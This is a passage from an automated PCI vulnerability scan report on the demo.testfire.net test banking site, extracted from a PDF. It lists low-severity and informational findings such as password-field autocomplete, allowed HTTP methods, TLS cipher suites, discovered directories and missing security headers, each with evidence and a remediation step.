267 Auto-Completion Enabled 1.2 Low Pass URL: https://demo.testfire.net:8443/login.jsp


for Password Fields Port: tcp/8443

The web server running on this host uses password fields that allow
auto-completion by users' browsers. This could allow a user's
credentials to be stored by the browser and subsequently exposed if
the user's computer becomes compromised.

CVSSv2: AV:L/AC:H/Au:N/C:P/I:N/A:N
Service: https
Application: apache:tomcat

Reference:

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 615 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
http://msdn.microsoft.com/en-us/library/ms533032.aspx
https://developer.mozilla.org/En/How_to_Turn_Off_Form_Autocompletio
n

Evidence:
Form Name: login
Action: https://demo.testfire.net:8443/doLogin
Fields: passw (password)
Location: https://demo.testfire.net:8443/login.jsp

Remediation:
Modify the identified page so that the password field and the enclosing
form tags have an attribute named "autocomplete" with a value of
"off".

If this is a vendor application, contact the vendor for an updated


version of the application or guidance on addressing this issue.

268 Auto-Completion Enabled 1.2 Low Pass URL: http://demo.testfire.net/login.jsp


for Password Fields Port: tcp/80

The web server running on this host uses password fields that allow
auto-completion by users' browsers. This could allow a user's
credentials to be stored by the browser and subsequently exposed if
the user's computer becomes compromised.

CVSSv2: AV:L/AC:H/Au:N/C:P/I:N/A:N
Service: http
Application: apache:tomcat

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 616 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
Reference:
http://msdn.microsoft.com/en-us/library/ms533032.aspx
https://developer.mozilla.org/En/How_to_Turn_Off_Form_Autocompletio
n

Evidence:
Form Name: login
Action: http://demo.testfire.net:80/doLogin
Fields: passw (password)
Location: http://demo.testfire.net/login.jsp

Remediation:
Modify the identified page so that the password field and the enclosing
form tags have an attribute named "autocomplete" with a value of
"off".

If this is a vendor application, contact the vendor for an updated


version of the application or guidance on addressing this issue.

269 Auto-Completion Enabled 1.2 Low Pass URL: http://65.61.137.117:8080/login.jsp


for Password Fields Port: tcp/8080

The web server running on this host uses password fields that allow
auto-completion by users' browsers. This could allow a user's
credentials to be stored by the browser and subsequently exposed if
the user's computer becomes compromised.

CVSSv2: AV:L/AC:H/Au:N/C:P/I:N/A:N
Service: http
Application: apache:tomcat

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 617 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status

Reference:
http://msdn.microsoft.com/en-us/library/ms533032.aspx
https://developer.mozilla.org/En/How_to_Turn_Off_Form_Autocompletio
n

Evidence:
Form Name: login
Action: http://65.61.137.117:8080/doLogin
Fields: passw (password)
Location: http://65.61.137.117:8080/login.jsp

Remediation:
Modify the identified page so that the password field and the enclosing
form tags have an attribute named "autocomplete" with a value of
"off".

If this is a vendor application, contact the vendor for an updated


version of the application or guidance on addressing this issue.

270 Auto-Completion Enabled 1.2 Low Pass URL: http://demo.testfire.net:8080/login.jsp


for Password Fields Port: tcp/8080

The web server running on this host uses password fields that allow
auto-completion by users' browsers. This could allow a user's
credentials to be stored by the browser and subsequently exposed if
the user's computer becomes compromised.

CVSSv2: AV:L/AC:H/Au:N/C:P/I:N/A:N
Service: http

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 618 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
Application: apache:tomcat

Reference:
http://msdn.microsoft.com/en-us/library/ms533032.aspx
https://developer.mozilla.org/En/How_to_Turn_Off_Form_Autocompletio
n

Evidence:
Form Name: login
Action: http://demo.testfire.net:8080/doLogin
Fields: passw (password)
Location: http://demo.testfire.net:8080/login.jsp

Remediation:
Modify the identified page so that the password field and the enclosing
form tags have an attribute named "autocomplete" with a value of
"off".

If this is a vendor application, contact the vendor for an updated


version of the application or guidance on addressing this issue.

271 Auto-Completion Enabled 1.2 Low Pass URL: https://demo.testfire.net/login.jsp


for Password Fields Port: tcp/443

The web server running on this host uses password fields that allow
auto-completion by users' browsers. This could allow a user's
credentials to be stored by the browser and subsequently exposed if
the user's computer becomes compromised.

CVSSv2: AV:L/AC:H/Au:N/C:P/I:N/A:N

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 619 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
Service: https
Application: apache:tomcat

Reference:
http://msdn.microsoft.com/en-us/library/ms533032.aspx
https://developer.mozilla.org/En/How_to_Turn_Off_Form_Autocompletio
n

Evidence:
Form Name: login
Action: https://demo.testfire.net:443/doLogin
Fields: passw (password)
Location: https://demo.testfire.net/login.jsp

Remediation:
Modify the identified page so that the password field and the enclosing
form tags have an attribute named "autocomplete" with a value of
"off".

If this is a vendor application, contact the vendor for an updated


version of the application or guidance on addressing this issue.

272 Auto-Completion Enabled 1.2 Low Pass URL: https://65.61.137.117:8443/login.jsp


for Password Fields Port: tcp/8443

The web server running on this host uses password fields that allow
auto-completion by users' browsers. This could allow a user's
credentials to be stored by the browser and subsequently exposed if
the user's computer becomes compromised.

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 620 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
CVSSv2: AV:L/AC:H/Au:N/C:P/I:N/A:N
Service: https
Application: apache:tomcat

Reference:
http://msdn.microsoft.com/en-us/library/ms533032.aspx
https://developer.mozilla.org/En/How_to_Turn_Off_Form_Autocompletio
n

Evidence:
Form Name: login
Action: https://65.61.137.117:8443/doLogin
Fields: passw (password)
Location: https://65.61.137.117:8443/login.jsp

Remediation:
Modify the identified page so that the password field and the enclosing
form tags have an attribute named "autocomplete" with a value of
"off".

If this is a vendor application, contact the vendor for an updated


version of the application or guidance on addressing this issue.

273 Website Location Detected 0.0 Info Pass URL: http://65.61.137.117:8080/survey_questions.jsp?step=a


Port: tcp/8080

A website location was detected.

CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: http

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 621 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status

274 Service Detected 0.0 Info Pass Port: tcp/80

This service responded to network probes.

CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: http
Application: apache:tomcat, apache:tomcat

Evidence:
application_cpe: cpe:/a:apache:tomcat, cpe:/a:apache:tomcat
application_name: apache:tomcat, apache:tomcat
application_protocol: http
ip_address: 65.61.137.117
port_number: 80
transport_protocol: tcp

275 Enumerated SSL/TLS Cipher 0.0 Info Pass Port: tcp/8443


Suites
The finding reports the SSL cipher suites for each SSL/TLS service
version provided by the remote service. This finding does not represent
a vulnerability, but is only meant to provide visibility into the behavior
and configuration of the remote SSL/TLS service.
The information provided as part of this finding includes the SSL
version (ex: TLSv1) as well as the name of the cipher suite (ex: RC4-
SHA).

A cipher suite is a set of cryptographic algorithms that provide


authentication, encryption, and message authentication code (MAC) as
part of an SSL/TLS negotiation and through the lifetime of the SSL

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 622 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
session. It is typical that an SSL service would support multiple cipher
suites. A cipher suite can be supported by across multiple SSL/TLS
versions, so you should be of no concern to see the same cipher name
reported for multiple

CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https
Application: apache:tomcat, apache:tomcat

Reference:
http://www.openssl.org/docs/apps/ciphers.html

Evidence:
Cipher Suite: TLSv1 : ECDHE-RSA-AES256-SHA
Cipher Suite: TLSv1 : DHE-RSA-AES256-SHA
Cipher Suite: TLSv1 : ECDHE-RSA-AES128-SHA
Cipher Suite: TLSv1 : DHE-RSA-AES128-SHA
Cipher Suite: TLSv1_1 : ECDHE-RSA-AES256-SHA
Cipher Suite: TLSv1_1 : DHE-RSA-AES256-SHA
Cipher Suite: TLSv1_1 : ECDHE-RSA-AES128-SHA
Cipher Suite: TLSv1_1 : DHE-RSA-AES128-SHA
Cipher Suite: TLSv1_2 : ECDHE-RSA-AES256-GCM-SHA384
Cipher Suite: TLSv1_2 : ECDHE-RSA-AES256-SHA384
Cipher Suite: TLSv1_2 : ECDHE-RSA-AES256-SHA
Cipher Suite: TLSv1_2 : DHE-RSA-AES256-GCM-SHA384
Cipher Suite: TLSv1_2 : DHE-RSA-AES256-SHA256
Cipher Suite: TLSv1_2 : DHE-RSA-AES256-SHA
Cipher Suite: TLSv1_2 : ECDHE-RSA-AES128-GCM-SHA256
Cipher Suite: TLSv1_2 : ECDHE-RSA-AES128-SHA256
Cipher Suite: TLSv1_2 : ECDHE-RSA-AES128-SHA

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 623 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
Cipher Suite: TLSv1_2 : DHE-RSA-AES128-GCM-SHA256
Cipher Suite: TLSv1_2 : DHE-RSA-AES128-SHA256
Cipher Suite: TLSv1_2 : DHE-RSA-AES128-SHA

Remediation:
No remediation is necessary.

276 Website Location Detected 0.0 Info Pass URL: https://demo.testfire.net/index.jsp


Port: tcp/443

A website location was detected.

CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https

277 Website Location Detected 0.0 Info Pass URL: http://demo.testfire.net:8080/feedback.jsp


Port: tcp/8080

A website location was detected.

CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: http

278 Website Location Detected 0.0 Info Pass URL: http://demo.testfire.net:8080/index.jsp?content=inside.htm


Port: tcp/8080

A website location was detected.

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 624 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: http

279 Discovered HTTP Methods 0.0 Info Pass URL: https://demo.testfire.net/my%20documents/


Port: tcp/443

Requesting the allowed HTTP OPTIONS from this host shows which
HTTP protocol methods are supported by its web server. Note that, in
some cases, this information is not reported by the web server
accurately.

CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https
Application: apache:tomcat

Evidence:
Methods: GET, HEAD, POST, PUT, DELETE, OPTIONS
URL: https://demo.testfire.net/my%20documents/

Remediation:
Review your web server configuration and ensure that only those HTTP
methods required for your business operations are enabled.

280 HTTP Responses Missing 0.0 Info Pass URL: http://65.61.137.117:8080/swagger/index.html


Character Encoding Port: tcp/8080

During the crawl of the HTTP service, we detected HTML and/or XML
documents that were missing any indication of their character set
encoding. The server and the pages it serves are responsible for

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 625 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
indicating the character set used to encode the documents. Typically,
these are indicated within the "Content-type" HTTP header, a 'meta'
HTTP-equiv HTML tag, or an XML document encoding header. Without
these, some web browsers may attempt to guess the character set
encoding of the document by making a guess based on whats
available. The danger in this is when browsers guess the incorrect
encoding, resulting in a misinterpretation of the document. In cases
where a webpage will reflect user-supplied information, an attacker
could provide a specially-crafted string that could trick a web browser
into decoding the document as a specific character set. If this specially-
crafted string were HTML code encoded in the character set, the
attacker could perform a cross-site scripting attack.

CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: http
Application: apache:tomcat

Reference:
http://code.google.com/p/browsersec/wiki/Part2#Character_set_handlin
g_and_detection
http://wiki.whatwg.org/wiki/Web_Encodings

Evidence:
URL: http://65.61.137.117:8080/swagger/index.html

Remediation:
It's important that all documents served by the HTTP server provide the
correct character set for their encoding. The provided links will provide
information on the proper ways for indicating the character set
encoding.

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 626 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status

281 Discovered HTTP Methods 0.0 Info Pass URL: http://65.61.137.117/swagger/


Port: tcp/80

Requesting the allowed HTTP OPTIONS from this host shows which
HTTP protocol methods are supported by its web server. Note that, in
some cases, this information is not reported by the web server
accurately.

CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: http
Application: apache:tomcat

Evidence:
Methods: GET, HEAD, POST, PUT, DELETE, OPTIONS
URL: http://65.61.137.117/swagger/

Remediation:
Review your web server configuration and ensure that only those HTTP
methods required for your business operations are enabled.

282 Enumerated Applications 0.0 Info Pass URL: http://65.61.137.117:8080/


Port: tcp/8080

The following applications have been enumerated on this device.

CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: http
Application: apache:tomcat

Evidence:

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 627 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
CPE: apache:tomcat
URI: /
Version: unknown

Remediation:
No remediation is required.

283 Website Location Detected 0.0 Info Pass URL: https://65.61.137.117:8443/search.jsp?query=_WSETESTDATA


Port: tcp/8443

A website location was detected.

CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https

284 Discovered Web Directories 0.0 Info Pass URL: https://demo.testfire.net:8443/bank/


Port: tcp/8443

It was possible to guess one or more directories contained in the


publicly accessible path of this web server.

CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https
Application: apache:tomcat

Evidence:
HTTP Response Code: 302
URL: https://demo.testfire.net:8443/bank/

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 628 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
Remediation:
Review these directories and verify that there is no unintentional
content made available to remote users.

285 Discovered HTTP Methods 0.0 Info Pass URL: https://demo.testfire.net:8443/swagger/


Port: tcp/8443

Requesting the allowed HTTP OPTIONS from this host shows which
HTTP protocol methods are supported by its web server. Note that, in
some cases, this information is not reported by the web server
accurately.

CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https
Application: apache:tomcat

Evidence:
Methods: GET, HEAD, POST, PUT, DELETE, OPTIONS
URL: https://demo.testfire.net:8443/swagger/

Remediation:
Review your web server configuration and ensure that only those HTTP
methods required for your business operations are enabled.

286 Service Detected 0.0 Info Pass Port: tcp/8443

This service responded to network probes.

CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 629 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
Service: https
Application: apache:tomcat, apache:tomcat

Evidence:
application_cpe: cpe:/a:apache:tomcat, cpe:/a:apache:tomcat
application_name: apache:tomcat, apache:tomcat
application_protocol: https
ip_address: 65.61.137.117
port_number: 8443
ssl_enabled: true
transport_protocol: tcp

287 Discovered Web Directories 0.0 Info Pass URL: http://demo.testfire.net:80/bank/


Port: tcp/80

It was possible to guess one or more directories contained in the


publicly accessible path of this web server.

CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: http
Application: apache:tomcat

Evidence:
HTTP Response Code: 302
URL: http://demo.testfire.net:80/bank/

Remediation:
Review these directories and verify that there is no unintentional
content made available to remote users.

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 630 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status

288 Discovered HTTP Methods 0.0 Info Pass URL: https://demo.testfire.net/swagger/


Port: tcp/443

Requesting the allowed HTTP OPTIONS from this host shows which
HTTP protocol methods are supported by its web server. Note that, in
some cases, this information is not reported by the web server
accurately.

CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https
Application: apache:tomcat

Evidence:
Methods: GET, HEAD, POST, PUT, DELETE, OPTIONS
URL: https://demo.testfire.net/swagger/

Remediation:
Review your web server configuration and ensure that only those HTTP
methods required for your business operations are enabled.

289 Discovered HTTP Methods 0.0 Info Pass URL: https://65.61.137.117:8443/my%20documents/


Port: tcp/8443

Requesting the allowed HTTP OPTIONS from this host shows which
HTTP protocol methods are supported by its web server. Note that, in
some cases, this information is not reported by the web server
accurately.

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 631 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https
Application: apache:tomcat

Evidence:
Methods: GET, HEAD, POST, PUT, DELETE, OPTIONS
URL: https://65.61.137.117:8443/my%20documents/

Remediation:
Review your web server configuration and ensure that only those HTTP
methods required for your business operations are enabled.

290 Embedded links or code 0.0 Info Pass URL: http://65.61.137.117/index.jsp?content=inside_contact.htm


from out-of-scope domains Port: tcp/80

Externally served scripts or objects can present a security risk because


they are not subject to system and application controls. Including
scripts from untrusted domains can result into any one of following 1-
Loss of control over changes to the application. 2- Execution of
arbitrary code on client systems. 3- Disclosure or leakage of sensitive
information to 3rd parties.

CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: http

Evidence:
DetectionDetails: Following External Links Found:
<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000"
codebase="http://fpdownload.macromedia.com/pub/shockwave/cabs/fl
ash/swflash.cab#version=6,0,0,0" width="

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 632 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
125" height="50" id="subscribe" align="middle"> <param
name="allowScriptAccess" value="sameDomain"> <param
name="movie" value="subscribe.swf"> <param name="quality"
value="high"> <param name="bgcolor" value="#ffffff"> <embed
src="subscribe.swf" width="125" height="50" text="subscribe"
align="middle" type="application/x-shockwave-flash"> </object>
Request: GET
http://65.61.137.117/index.jsp?content=inside_contact.htm HTTP/1.1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Cookie: JSESSIONID=7DEA7694E36255C4C48824F9A0DE4E13

Remediation:
If external scripts are necessary to provide a particular service then get
the scripts from the third party, perform a review for functionality and
integrity and post it on a web server.

291 Website Location Detected 0.0 Info Pass URL: https://demo.testfire.net/index.jsp?content=inside_contact.ht


m
Port: tcp/443

A website location was detected.

CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https

292 Website Detected 0.0 Info Pass URL: http://65.61.137.117:8080/

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 633 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
Port: tcp/8080

This website was detected.

CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: http

293 Website Location Detected 0.0 Info Pass URL: https://65.61.137.117:8443/index.jsp?content=business.htm


Port: tcp/8443

A website location was detected.

CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https

294 Website Location Detected 0.0 Info Pass URL: https://65.61.137.117:8443/doSubscribe


Port: tcp/8443

A website location was detected.

CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https

295 Website Location Detected 0.0 Info Pass URL: https://65.61.137.117:8443/survey_questions.jsp?step=a


Port: tcp/8443

A website location was detected.

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 634 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https

296 Embedded links or code 0.0 Info Pass URL: https://65.61.137.117:8443/index.jsp?content=inside_contact.


from out-of-scope domains htm
Port: tcp/8443

Externally served scripts or objects can present a security risk because


they are not subject to system and application controls. Including
scripts from untrusted domains can result into any one of following 1-
Loss of control over changes to the application. 2- Execution of
arbitrary code on client systems. 3- Disclosure or leakage of sensitive
information to 3rd parties.

CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https

Evidence:
DetectionDetails: Following External Links Found:
<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000"
codebase="http://fpdownload.macromedia.com/pub/shockwave/cabs/fl
ash/swflash.cab#version=6,0,0,0" width="125" height="50"
id="subscribe" align="middle"> <param name="allowScriptAccess"
value="sameDomain"> <param name="movie"
value="subscribe.swf"> <param name="quality" value="high">
<param name="bgcolor" value="#ffffff"> <embed
src="subscribe.swf" width="125" height="50" text="subscribe"
align="middle" type="application/x-shockwave-flash"> </object>
Request: GET
https://65.61.137.117:8443/index.jsp?content=inside_contact.htm
HTTP/1.1

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 635 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Cookie: JSESSIONID=9B8C68C14BB9B053BB189485F1F888A4

Remediation:
If external scripts are necessary to provide a particular service then get
the scripts from the third party, perform a review for functionality and
integrity and post it on a web server.

297 Insufficient or No use of 0.0 Info Pass URL: https://65.61.137.117:8443/


Strict Transport Security Port: tcp/8443
header
HTTP Strict Transport Security (HSTS) is an opt-in security
enhancement that is specified by a web application through the use of
a special response header. Once a supported browser receives this
header that browser will prevent any communications from being sent
over HTTP to the specified domain and will instead send all
communications over HTTPS. It also prevents HTTPS click through
prompts on browsers.

CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https

Reference:
https://www.owasp.org/index.php/HTTP_Strict_Transport_Security

Evidence:
DetectionDetails: No HSTS implemented for HTTPS
Request: GET https://65.61.137.117:8443/ HTTP/1.1

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 636 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36

Remediation:
Example of response header use-
Strict-Transport-Security: max-age=31536000

298 Website Location Detected 0.0 Info Pass URL: https://65.61.137.117/disclaimer.htm?url=http://www.netscape


.com
Port: tcp/443

A website location was detected.

CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https

299 Website Location Detected 0.0 Info Pass URL: https://65.61.137.117/swagger/index.html


Port: tcp/443

A website location was detected.

CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https

300 Website Location Detected 0.0 Info Pass URL: http://demo.testfire.net:8080/


Port: tcp/8080

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 637 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status

A website location was detected.

CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: http

301 Website Location Detected 0.0 Info Pass URL: http://demo.testfire.net:8080/index.jsp?content=inside_contac


t.htm
Port: tcp/8080

A website location was detected.

CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: http

302 Website Location Detected 0.0 Info Pass URL: http://demo.testfire.net:8080/disclaimer.htm?url=http://www.n


etscape.com
Port: tcp/8080

A website location was detected.

CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: http

303 Insecure or no Content- 0.0 Info Pass URL: https://demo.testfire.net:8443/


Security-Policy header Port: tcp/8443

Content-Security-Policy (CSP) is a W3C specification offering the

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 638 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
possibility to instruct the client browser from which location and/or
